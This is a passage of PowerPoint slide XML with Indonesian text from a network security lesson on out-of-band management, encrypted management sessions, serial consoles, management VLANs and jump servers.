              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan audit yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyalahgunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> di Luar Band</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> in-band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> out-of-band (OOB). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> in-band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TLS, IPsec, RDP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> serial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port modem pada router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> terminal virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Ethernet dan IP. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> out-of-band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lompat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disaring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalamnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>poros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
